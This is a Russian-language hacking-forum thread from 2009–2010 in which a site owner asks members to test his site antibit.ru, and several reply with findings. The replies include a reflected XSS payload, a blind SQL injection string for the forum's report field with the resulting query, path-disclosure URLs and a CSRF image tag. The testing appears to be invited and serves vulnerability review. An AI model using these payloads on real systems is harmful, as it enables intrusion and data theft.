HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг > Проверка на уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

ВАП сайт. Нужна проверка.
  #1  
Старый 14.11.2009, 00:37
azote
Новичок
Регистрация: 28.03.2008
Сообщений: 24
С нами: 9537021

Репутация: -5
Question ВАП сайт. Нужна проверка.

Cайт antibit.ru
Проверьте пожалуйста, тем кто чем-нибудь поможет, буду очень и весьма признателен.
Картинка ачата стоит.

Тестовый Аккаунт:
login: antichat
pass: antichat


Хотелось бы проверить:


http://antibit.ru/forum/ (особенно при добавлении файла в тему)
http://antibit.ru/add/
http://antibit.ru/kontakts/
http://antibit.ru/ignors/
http://antibit.ru/files

Последний раз редактировалось azote; 28.05.2010 в 16:57..
 
Ответить с цитированием

  #2  
Старый 14.11.2009, 15:25
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
С нами: 10025299

Репутация: 412
По умолчанию

antibit.ru/index.php?do=files&name[]=Din
раскрытие пути
------------------
index.php?do=files&name=Din
пасив xss в поиске
 
Ответить с цитированием

  #3  
Старый 15.11.2009, 02:21
XenkoK
Новичок
Регистрация: 23.12.2008
Сообщений: 18
С нами: 9148514

Репутация: 7
По умолчанию

Цитата:
Сообщение от azote  
Cпасибо, убрал.


А можно поподробней узнать где тут Хss ?

гг перейди: http://antibit.ru/index.php?do=files&name=Din

и в поиске напишы: "><script>alert()</script>

Последний раз редактировалось XenkoK; 15.11.2009 в 02:23..
 
Ответить с цитированием

  #4  
Старый 22.12.2009, 21:48
azote
Новичок
Регистрация: 28.03.2008
Сообщений: 24
С нами: 9537021

Репутация: -5
По умолчанию

Акутально. Картинка ачата стоит. Тестовый акк дал. В шапке указал модули которые хотелось бы проверить.

Последний раз редактировалось azote; 23.12.2009 в 21:43..
 
Ответить с цитированием

  #5  
Старый 23.12.2009, 01:20
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию

http://antibit.ru/index.php?do=members&orderby[]=warn_up
 
Ответить с цитированием

  #6  
Старый 03.01.2010, 18:54
SnooPy
Новичок
Регистрация: 16.12.2009
Сообщений: 18
С нами: 8633175

Репутация: 3
По умолчанию

http://antibit.ru/members/ в поиске кавычку отфильтруй!
 
Ответить с цитированием

  #7  
Старый 22.04.2010, 23:35
azote
Новичок
Регистрация: 28.03.2008
Сообщений: 24
С нами: 9537021

Репутация: -5
По умолчанию

Хотелось бы првоерить:

http://antibit.ru/forum/
http://antibit.ru/members/
http://antibit.ru/kontakts/
http://antibit.ru/ignors/
 
Ответить с цитированием

SQL
  #8  
Старый 23.04.2010, 04:57
life_glider
Познающий
Регистрация: 13.04.2010
Сообщений: 42
С нами: 8463290

Репутация: 81
Thumbs up SQL

SQL-injection в insert-е, вроде как слепая.
Уязвимо поле причина жалобы в форуме когда нажимаем пожаловаться.
http://antibit.ru/forum/topic_101/report/2
вставил
123','123338', 'system', '1271983556', 'no', VERSION())/*
прошло
123','123338', 'system', '1271983556', 'no', VERSION()')/*
обана
PHP код:
INSERT INTO dle_pm (subjtextuseruser_fromdatepm_readfoldervalues ('Жалоба на сообщение форума.''Данную жалобу вам отправил antichat<br>
Текст жалобы: 123'
,'123338''system''1271983556''no'VERSION()')/*<br>
Тема: <a href="http://antibit.ru/index.php?do=forum&showtopic=255">Перейти в тему</a><br>
ID сообщения: 2'
338'system''1271983702''no''inbox'
Раскрытие путей:
PHP код:
Warningsocket_write(): 21 is not a valid Socket resource in /home/a/antibitru/public_html/engine/classes/icq.class.php on line 239 Warningsocket_close(): 21 is not a valid Socket resource in /home/a/antibitru/public_html/engine/classes/icq.class.php on line 294 
http://antibit.ru/icq_send/send/359
CSRF:
Добавляем В ИГНОР:
<img src="http://antibit.ru/ignors/add/358" alt="" />

Последний раз редактировалось life_glider; 23.04.2010 в 20:30..
 
Ответить с цитированием

  #9  
Старый 28.05.2010, 16:57
azote
Новичок
Регистрация: 28.03.2008
Сообщений: 24
С нами: 9537021

Репутация: -5
По умолчанию

Обновил шапку, проверьте пожалуйста.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Регеры ICQ UIN'ов by saiNT sai_NT Skype, IRC, ICQ, Jabber и другие IM 481 17.09.2010 17:58



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору. Комиссия форума: 2%.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...